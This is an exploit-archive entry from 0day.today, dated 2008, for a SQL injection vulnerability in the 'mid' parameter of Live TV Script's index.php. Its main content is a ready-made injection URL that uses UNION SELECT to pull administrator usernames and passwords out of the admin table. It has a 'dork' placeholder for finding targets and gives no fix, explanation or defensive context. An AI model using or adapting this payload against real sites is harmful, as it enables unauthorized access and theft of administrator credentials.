id: 3625
date: 09/08/2008
title: Live TV Script (index.php mid) SQL Injection Vulnerability
author: 0day Today Team
cves: 

==========================================================
Live TV Script (index.php mid) SQL Injection Vulnerability
==========================================================



=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++
=======================================================


<<->> D0rk    : find it

<<->> Exploit :>>>

          >>>> www.site.me/patch/index.php?mid=-99999+union+select+0,unhex(hex(concat(uid,0x3a,pwd))),0,0+from+admin/*



#  0day.today [2023-03-26]  #